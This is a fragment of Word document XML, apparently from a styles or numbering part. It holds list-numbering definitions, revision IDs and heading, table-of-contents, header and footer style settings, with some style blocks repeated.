    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8AF8D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4C20222"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0D3AE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2B4FD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E2E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E16795A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBA05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4BB6107"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0EBA5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42165B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAEED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8046B0F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8C04F78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6">
    <w:nsid w:val="59FA105E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11BC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06663EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4792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3F2158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102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nsid w:val="712B49BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEE8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376547"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A42F4F6"/>
    <w:lvl w:ilvl="0" w:tplc="EC4E18FE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="72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70B27AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3564B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9BA165C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F49C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D9522FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D324B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21"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="25"/>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642"/>
    <w:rsid w:val="000102C4"/>
    <w:rsid w:val="00014265"/>
    <w:rsid w:val="00042D54"/>
    <w:rsid w:val="00045479"/>
    <w:rsid w:val="00054348"/>
    <w:rsid w:val="00054C68"/>
    <w:rsid w:val="000C0349"/>
    <w:rsid w:val="001101FA"/>
    <w:rsid w:val="001150FA"/>
    <w:rsid w:val="00133237"/>
    <w:rsid w:val="00141FDA"/>
    <w:rsid w:val="001620E3"/>
    <w:rsid w:val="00164451"/>
    <w:rsid w:val="0018388F"/>
    <w:rsid w:val="00190F1E"/>
    <w:rsid w:val="001C0224"/>
    <w:rsid w:val="001E34EF"/>
    <w:rsid w:val="001F694F"/>
    <w:rsid w:val="00201B13"/>
    <w:rsid w:val="00222FFF"/>
    <w:rsid w:val="00234B4D"/>
    <w:rsid w:val="00252F8F"/>
    <w:rsid w:val="002662B8"/>
    <w:rsid w:val="00285046"/>
    <w:rsid w:val="00291023"/>
    <w:rsid w:val="002E59E8"/>
    <w:rsid w:val="002F3B19"/>
    <w:rsid w:val="00300D60"/>
    <w:rsid w:val="00311A04"/>
    <w:rsid w:val="00326E4D"/>
    <w:rsid w:val="00336003"/>
    <w:rsid w:val="00337A00"/>
    <w:rsid w:val="0034449E"/>
    <w:rsid w:val="00345CD7"/>
    <w:rsid w:val="00347A09"/>
    <w:rsid w:val="00381E3D"/>
    <w:rsid w:val="00384BDB"/>
    <w:rsid w:val="003A37AA"/>
    <w:rsid w:val="003B18EB"/>
    <w:rsid w:val="003B63CE"/>
    <w:rsid w:val="003C4B8A"/>
    <w:rsid w:val="003C688D"/>
    <w:rsid w:val="003F1E58"/>
    <w:rsid w:val="0042740F"/>
    <w:rsid w:val="00443577"/>
    <w:rsid w:val="0044735A"/>
    <w:rsid w:val="00456084"/>
    <w:rsid w:val="004A5489"/>
    <w:rsid w:val="004A62B5"/>
    <w:rsid w:val="004D534D"/>
    <w:rsid w:val="00506ABE"/>
    <w:rsid w:val="0050788B"/>
    <w:rsid w:val="00511F46"/>
    <w:rsid w:val="005442F2"/>
    <w:rsid w:val="00545026"/>
    <w:rsid w:val="005749AD"/>
    <w:rsid w:val="00591642"/>
    <w:rsid w:val="00592954"/>
    <w:rsid w:val="00593DB4"/>
    <w:rsid w:val="00597449"/>
    <w:rsid w:val="005C0756"/>
    <w:rsid w:val="005C6AB8"/>
    <w:rsid w:val="005D2DD8"/>
    <w:rsid w:val="00601437"/>
    <w:rsid w:val="0061185E"/>
    <w:rsid w:val="00624BF5"/>
    <w:rsid w:val="00626221"/>
    <w:rsid w:val="006420AB"/>
    <w:rsid w:val="00646D18"/>
    <w:rsid w:val="006508B8"/>
    <w:rsid w:val="00671BC6"/>
    <w:rsid w:val="006C076B"/>
    <w:rsid w:val="006C5DDE"/>
    <w:rsid w:val="006E4811"/>
    <w:rsid w:val="00701604"/>
    <w:rsid w:val="0073770F"/>
    <w:rsid w:val="00750207"/>
    <w:rsid w:val="00755D13"/>
    <w:rsid w:val="007609F0"/>
    <w:rsid w:val="007825B9"/>
    <w:rsid w:val="00794D0D"/>
    <w:rsid w:val="007A16D1"/>
    <w:rsid w:val="007C4DA3"/>
    <w:rsid w:val="007C7CBB"/>
    <w:rsid w:val="007D3AE7"/>
    <w:rsid w:val="007D6D22"/>
    <w:rsid w:val="007E37B9"/>
    <w:rsid w:val="007F46F6"/>
    <w:rsid w:val="00804415"/>
    <w:rsid w:val="00806C1F"/>
    <w:rsid w:val="008118AA"/>
    <w:rsid w:val="00822C97"/>
    <w:rsid w:val="008271C7"/>
    <w:rsid w:val="00827CC6"/>
    <w:rsid w:val="00851DF0"/>
    <w:rsid w:val="00852CAF"/>
    <w:rsid w:val="00874A6A"/>
    <w:rsid w:val="00886047"/>
    <w:rsid w:val="008B6D90"/>
    <w:rsid w:val="008D3B4B"/>
    <w:rsid w:val="008D73C7"/>
    <w:rsid w:val="008E504A"/>
    <w:rsid w:val="008F7800"/>
    <w:rsid w:val="00915C64"/>
    <w:rsid w:val="00916B10"/>
    <w:rsid w:val="00917D2F"/>
    <w:rsid w:val="009528B5"/>
    <w:rsid w:val="009611A8"/>
    <w:rsid w:val="00972768"/>
    <w:rsid w:val="00972EFB"/>
    <w:rsid w:val="00987EF5"/>
    <w:rsid w:val="00991731"/>
    <w:rsid w:val="009A6D6A"/>
    <w:rsid w:val="009B4542"/>
    <w:rsid w:val="00A157FB"/>
    <w:rsid w:val="00A3716A"/>
    <w:rsid w:val="00A458DB"/>
    <w:rsid w:val="00A52A61"/>
    <w:rsid w:val="00A55F7D"/>
    <w:rsid w:val="00A7467C"/>
    <w:rsid w:val="00A837BD"/>
    <w:rsid w:val="00A92D13"/>
    <w:rsid w:val="00AA64D4"/>
    <w:rsid w:val="00AB0C50"/>
    <w:rsid w:val="00AB3F18"/>
    <w:rsid w:val="00AB515F"/>
    <w:rsid w:val="00AB7B99"/>
    <w:rsid w:val="00AC572F"/>
    <w:rsid w:val="00AE4B0D"/>
    <w:rsid w:val="00B33D0B"/>
    <w:rsid w:val="00B34A71"/>
    <w:rsid w:val="00B53CEB"/>
    <w:rsid w:val="00B570CD"/>
    <w:rsid w:val="00B736C5"/>
    <w:rsid w:val="00B84EFC"/>
    <w:rsid w:val="00BA0431"/>
    <w:rsid w:val="00BA2761"/>
    <w:rsid w:val="00BB200C"/>
    <w:rsid w:val="00BE0420"/>
    <w:rsid w:val="00BE304D"/>
    <w:rsid w:val="00BF70A0"/>
    <w:rsid w:val="00C00469"/>
    <w:rsid w:val="00C04F69"/>
    <w:rsid w:val="00C14093"/>
    <w:rsid w:val="00C1637B"/>
    <w:rsid w:val="00CC2F89"/>
    <w:rsid w:val="00CD24EC"/>
    <w:rsid w:val="00CD2DB9"/>
    <w:rsid w:val="00D00950"/>
    <w:rsid w:val="00D07609"/>
    <w:rsid w:val="00D402A8"/>
    <w:rsid w:val="00DA14BF"/>
    <w:rsid w:val="00DB1C6E"/>
    <w:rsid w:val="00DB1E69"/>
    <w:rsid w:val="00DB6382"/>
    <w:rsid w:val="00DC4658"/>
    <w:rsid w:val="00DE1B01"/>
    <w:rsid w:val="00DE2A4F"/>
    <w:rsid w:val="00DF6CEB"/>
    <w:rsid w:val="00E20BB1"/>
    <w:rsid w:val="00E401E9"/>
    <w:rsid w:val="00E5043F"/>
    <w:rsid w:val="00E813F1"/>
    <w:rsid w:val="00EC4F81"/>
    <w:rsid w:val="00EE4184"/>
    <w:rsid w:val="00F247B2"/>
    <w:rsid w:val="00F50BFC"/>
    <w:rsid w:val="00F668ED"/>
    <w:rsid w:val="00F7143D"/>
    <w:rsid w:val="00F76514"/>
    <w:rsid w:val="00F83F66"/>
    <w:rsid w:val="00F90CD5"/>
    <w:rsid w:val="00FA1A6B"/>
    <w:rsid w:val="00FA68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77F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6084"/>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141FDA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="002060"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00141FDA"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="576"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00A157FB"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="21"/>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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="21"/>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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="21"/>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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="2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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="2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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="2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1FDA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A157FB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B4542"/>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9B4542"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00141FDA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="002060"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="000C034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0C034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0C034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0C034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0C034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C0349"/>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456084"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00133237"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00133237"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00291023"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0044735A"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F7143D"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F7143D"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F7143D"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F7143D"/>
    <w:pPr>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F7143D"/>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F7143D"/>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F7143D"/>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F7143D"/>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F7143D"/>
    <w:pPr>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F7143D"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="0"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F7143D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F7143D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F7143D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F7143D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F7143D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006420AB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA0431"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007A16D1"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB1C6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1C6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6084"/>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141FDA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:before="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="002060"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00141FDA"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="576"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00A157FB"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="000C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="21"/>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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="21"/>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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="21"/>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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="2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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="2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C0349"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="2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1FDA"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A157FB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B4542"/>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9B4542"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
